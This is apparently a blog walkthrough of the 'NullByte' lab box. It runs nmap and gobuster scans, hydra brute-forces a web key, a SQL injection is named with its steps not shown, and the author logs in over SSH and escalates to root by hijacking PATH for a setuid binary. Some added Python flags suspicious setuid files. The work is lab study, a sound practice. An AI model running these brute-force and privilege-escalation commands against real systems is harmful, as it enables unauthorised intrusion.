Nullbyte box

Information gathering

nmap scan

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.108
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-27 02:59 EDT
Nmap scan report for 192.168.56.108
Host is up (0.00022s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
777/tcp open multiling-http
38157/tcp open unknown
MAC Address: 08:00:27:1C:0D:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80,111,777,38157 192.168.56.108
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-27 03:01 EDT
Nmap scan report for 192.168.56.108
Host is up (0.00038s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Null Byte 00 - level 1
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 38157/tcp status
| 100024 1 40076/udp status
| 100024 1 53418/tcp6 status
|_ 100024 1 53583/udp6 status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
| 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_ 256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
38157/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:1C:0D:6F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p80,111,777,38157 192.168.56.108
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-27 03:03 EDT
Nmap scan report for 192.168.56.108
Host is up (0.00026s latency).

PORT STATE SERVICE
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /phpmyadmin/: phpMyAdmin
|_ /uploads/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
111/tcp open rpcbind
777/tcp open multiling-http
38157/tcp open unknown
MAC Address: 08:00:27:1C:0D:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 321.11 seconds

Looking at the web interface

There is one image, main.gif, and the page source holds nothing useful, so let's brute-force the directories.

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.56.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,zip,html,sql,php -t 64
[sudo] password for kali:
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.108
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: sql,php,txt,zip,html
[+] Timeout: 10s
===============================================================
2023/05/27 05:11:27 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 294]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.108/uploads/]
/index.html (Status: 200) [Size: 196]
/.php (Status: 403) [Size: 293]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.108/javascript/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.56.108/phpmyadmin/]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/server-status (Status: 403) [Size: 302]
Progress: 1321309 / 1323366 (99.84%)===============================================================
2023/05/27 05:15:20 Finished
===============================================================

Take a look at phpmyadmin

Trying weak passwords fails, and brute-forcing it hardly seems the way… let's look at uploads instead.

Hmm, still no ideas. A look at the red-team notes reveals the trick: the home-page image contains hidden information.

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ wget http://192.168.56.108/main.gif
--2023-05-28 03:43:54-- http://192.168.56.108/main.gif
Connecting to 192.168.56.108:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16647 (16K) [image/gif]
Saving to: ‘main.gif’

main.gif 100%[=======================================================================================================================================>] 16.26K --.-KB/s in 0s

2023-05-28 03:43:54 (95.3 MB/s) - ‘main.gif’ saved [16647/16647]

Use tools to inspect the file header and basic metadata

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ file main.gif
main.gif: GIF image data, version 89a, 235 x 302

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ binwalk main.gif

DECIMAL HEXADECIMAL DESCRIPTION
------------------------------------------------------------------------
0 0x0 GIF image data, version "89a", 235 x 302

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ exiftool main.gif
ExifTool Version Number : 12.57
File Name : main.gif
Directory : .
File Size : 17 kB
File Modification Date/Time : 2015:08:01 12:39:30-04:00
File Access Date/Time : 2023:05:28 03:44:10-04:00
File Inode Change Date/Time : 2023:05:28 03:43:54-04:00
File Permissions : -rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071

We get a very short string, and this is where some lateral thinking is needed. First, try it as the phpmyadmin login: fails. Next, check whether it is base64 or some other encoding: fails. Finally, try it as a directory name: success.

It looks like a page that asks for a password; take a look at the page source.

It should be brute-forceable, so let's try hydra.

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt -s 80 192.168.56.108 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key"
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-28 04:01:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.56.108:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key
[STATUS] 4504.00 tries/min, 4504 tries in 00:01h, 14339895 to do in 53:04h, 16 active
[STATUS] 4088.00 tries/min, 12264 tries in 00:03h, 14332135 to do in 58:26h, 16 active
[80][http-post-form] host: 192.168.56.108 login: root password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-28 04:07:27

That yields the password. After logging in, there is an extremely bare page that looks up information by username; it looks like it may have SQL injection. Trying ' fails and gives the result below, and trying a number concatenated with ' still gives the same page.

Trying " succeeds, and the rest is the process of hand-crafting the SQL injection statements.

Union query

Find the database name

Find the table names

Find the column names

Dump the contents

Decode the base64

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ echo -e "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE-" | base64 -d
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input

It looks like there is still another layer of encryption

Look for a hash-cracking tool
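The `base64 -d` call above printed the decoded value and then "invalid input", because the string pulled from the database carries a stray trailing "-" that is not in the base64 alphabet. The following Python is an added example, not part of the original writeup: it strips such characters, restores the missing padding, and then describes what the decoded value looks like by length (the digest-length table is an assumption for labelling only; nothing here reverses a hash).

```python
import base64
import re

# The value taken from the writeup's database dump, including the trailing "-"
# that made `base64 -d` complain.
RAW_FROM_DB = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE-"

# Hex-character lengths of common digests; used only to label the decoded
# value, not to identify the algorithm with certainty.
HEX_DIGEST_LENGTHS = {32: "MD5-sized", 40: "SHA-1-sized", 64: "SHA-256-sized"}


def lenient_b64decode(text: str) -> bytes:
    """Decode base64 while tolerating what broke the shell pipeline: drop any
    character outside the standard alphabet (here the trailing '-'), then pad
    with '=' so the length is a multiple of 4.  Returns the decoded bytes."""
    cleaned = re.sub(r"[^A-Za-z0-9+/]", "", text)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True)


def classify_decoded(data: bytes) -> str:
    """Describe the decoded payload: a lowercase hex string of a known digest
    length is reported by size; anything else is reported as text or binary."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return "binary data, %d bytes" % len(data)
    if re.fullmatch(r"[0-9a-f]+", text) and len(text) in HEX_DIGEST_LENGTHS:
        return "%s hex digest (%d hex chars)" % (
            HEX_DIGEST_LENGTHS[len(text)], len(text))
    return "text: %r" % text


if __name__ == "__main__":
    decoded = lenient_b64decode(RAW_FROM_DB)
    print(decoded.decode("ascii"))   # c6d6bd7ebf806f43c76acc3681703b81
    print(classify_decoded(decoded))  # MD5-sized hex digest (32 hex chars)
```

The 32 lowercase hex characters are why the next step reaches for a hash-cracking tool rather than another decoder: the value is a digest, not a second encoding layer.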

That gives the password; together with the username from earlier, try logging in over ssh

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ ssh ramses@192.168.56.108 -p777
ramses@192.168.56.108's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ whoami
ramses
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ uname -a
Linux NullByte 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt11-1+deb8u2 (2015-07-17) i686 GNU/Linux
ramses@NullByte:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:1c:0d:6f brd ff:ff:ff:ff:ff:ff
inet 192.168.56.108/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe1c:d6f/64 scope link
valid_lft forever preferred_lft forever
ramses@NullByte:~$ sudo -l
[sudo] password for ramses:
Sorry, user ramses may not run sudo on NullByte.

Privilege escalation

While checking for files with the setuid (s) bit, an unusual file turns up in the backup directory

ramses@NullByte:/home$ find / -type f -perm -04000 -ls 2>/dev/null
273365 552 -rwsr-xr-x 1 root root 562536 Mar 23 2015 /usr/lib/openssh/ssh-keysign
274287 16 -rwsr-xr-x 1 root root 13796 Nov 28 2014 /usr/lib/policykit-1/polkit-agent-helper-1
267213 8 -rwsr-xr-x 1 root root 5372 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
261444 12 -rwsr-xr-x 1 root root 9540 Apr 15 2015 /usr/lib/pt_chown
271482 356 -rwsr-xr-- 1 root messagebus 362672 May 28 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
273383 96 -rwsr-sr-x 1 root mail 96192 Feb 12 2015 /usr/bin/procmail
272955 52 -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
265920 52 -rwsr-xr-x 1 root root 52344 Nov 20 2014 /usr/bin/chfn
263697 40 -rwsr-xr-x 1 root root 38740 Nov 20 2014 /usr/bin/newgrp
265925 44 -rwsr-xr-x 1 root root 43576 Nov 20 2014 /usr/bin/chsh
265924 80 -rwsr-xr-x 1 root root 78072 Nov 20 2014 /usr/bin/gpasswd
274292 20 -rwsr-xr-x 1 root root 18064 Nov 28 2014 /usr/bin/pkexec
265921 52 -rwsr-xr-x 1 root root 53112 Nov 20 2014 /usr/bin/passwd
278443 176 -rwsr-xr-x 1 root root 176400 Mar 12 2015 /usr/bin/sudo
273033 1056 -rwsr-xr-x 1 root root 1081076 Feb 18 2015 /usr/sbin/exim4
391947 8 -rwsr-xr-x 1 root root 4932 Aug 2 2015 /var/www/backup/procwatch
519235 40 -rwsr-xr-x 1 root root 38868 Nov 20 2014 /bin/su
519210 36 -rwsr-xr-x 1 root root 34684 Mar 30 2015 /bin/mount
519212 28 -rwsr-xr-x 1 root root 26344 Mar 30 2015 /bin/umount
149 96 -rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
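From the defender's side, the interesting part of this listing is not the stock Debian helpers but the one entry outside the usual system prefixes. The following Python is an added example, not part of the original writeup: it parses `find -ls` lines like those above (a subset of them is embedded inline) and flags root-owned setuid binaries that live outside the expected directories. The EXPECTED_PREFIXES list is an assumption about a Debian-style layout.

```python
import re
from typing import Dict, List

# A subset of the `find / -type f -perm -04000 -ls` lines from the listing above.
FIND_LS_OUTPUT = """\
265921 52 -rwsr-xr-x 1 root root 53112 Nov 20 2014 /usr/bin/passwd
278443 176 -rwsr-xr-x 1 root root 176400 Mar 12 2015 /usr/bin/sudo
273383 96 -rwsr-sr-x 1 root mail 96192 Feb 12 2015 /usr/bin/procmail
272955 52 -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
391947 8 -rwsr-xr-x 1 root root 4932 Aug 2 2015 /var/www/backup/procwatch
519235 40 -rwsr-xr-x 1 root root 38868 Nov 20 2014 /bin/su
"""

# Where setuid helpers are expected on a Debian-style system (assumption).
EXPECTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                     "/usr/lib/", "/usr/libexec/")

# inode, blocks, mode, links, owner, group, size, month, day, year-or-time, path
LINE_RE = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<mode>\S{10,11})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)\s*$"
)


def parse_find_ls(output: str) -> List[Dict[str, str]]:
    """Turn `find -ls` output into records; lines that do not match are skipped."""
    records = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def suspicious_setuid(records: List[Dict[str, str]]) -> List[str]:
    """Paths a defender should triage first: setuid bit set (the 's' in the
    owner-execute slot), owned by root, and outside the expected prefixes.
    A web tree such as /var/www is where a hand-built helper tends to appear."""
    flagged = []
    for r in records:
        is_suid = r["mode"][3] in "sS"
        in_expected = r["path"].startswith(EXPECTED_PREFIXES)
        if is_suid and r["owner"] == "root" and not in_expected:
            flagged.append(r["path"])
    return flagged


if __name__ == "__main__":
    for path in suspicious_setuid(parse_find_ls(FIND_LS_OUTPUT)):
        print("review:", path)   # review: /var/www/backup/procwatch
```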

Use cat to look at the /var/www/backup/procwatch file; it seems to be a binary produced by gcc

ramses@NullByte:/home$ ls -liah /var/www/backup/procwatch
391947 -rwsr-xr-x 1 root root 4.9K Aug 2 2015 /var/www/backup/procwatch

Let's run it and see

ramses@NullByte:/var/www/backup$ /var/www/backup/procwatch
PID TTY TIME CMD
1485 pts/0 00:00:00 procwatch
1486 pts/0 00:00:00 sh
1487 pts/0 00:00:00 ps

It seems to invoke sh and ps; the privilege-escalation method here is worth committing to memory

ramses@NullByte:/var/www/backup$ ln -s /bin/sh ps
ramses@NullByte:/var/www/backup$ export PATH=.:$PATH
ramses@NullByte:/var/www/backup$ ./procwatch
# whoami
root
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls
proof.txt
# cat pro
cat: pro: No such file or directory
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY


https://i3eg1nner.github.io/2023/05/59d54dfe404f.html
Author: I3eg1nner
Published: May 27, 2023